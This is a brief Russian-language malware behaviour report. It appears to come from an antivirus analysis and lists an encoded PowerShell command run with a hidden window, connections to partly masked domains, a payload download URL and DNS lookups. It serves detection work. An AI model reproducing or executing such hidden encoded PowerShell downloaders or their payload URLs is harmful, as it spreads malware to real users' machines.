Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABRAEIAagBvADYAUgBwAD0AJwBFAGEAZABxAHIAVQAnADsAJABNAEQANgAwADYAZgAgAD0AIAAnADkANgA5ACcAOwAkAGoAYQAyAFoAXwA0AD0AJwBwAHcAQgB1AEUARgA3ACcAOwAkAEMAbwB2AGkARABHAEEAPQAkAGUAbgB2ADoAdQBzAGUAc...
- 'pa#####bentivoglio.org':80
- 'pa#####bentivoglio.org':443
- http://www.pa#####bentivoglio.org/softaculous/ZLXVNXrCC/
- 'pa#####bentivoglio.org':443
- DNS ASK ev######ngtobetrendy.com
- DNS ASK sa###raca.com
- DNS ASK pa#####bentivoglio.org
- DNS ASK ai###ory.com
- DNS ASK an#####usassists.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABRAEIAagBvADYAUgBwAD0AJwBFAGEAZABxAHIAVQAnADsAJABNAEQANgAwADYAZgAgAD0AIAAnADkANgA5ACcAOwAkAGoAYQAyAFoAXwA0AD0AJwBwAHcAQgB1AEUARgA3ACcAOwAkAEMAbwB2AGkARABHAEEAPQAkAGUAbgB2ADoAdQBzAGUAc... (со скрытым окном)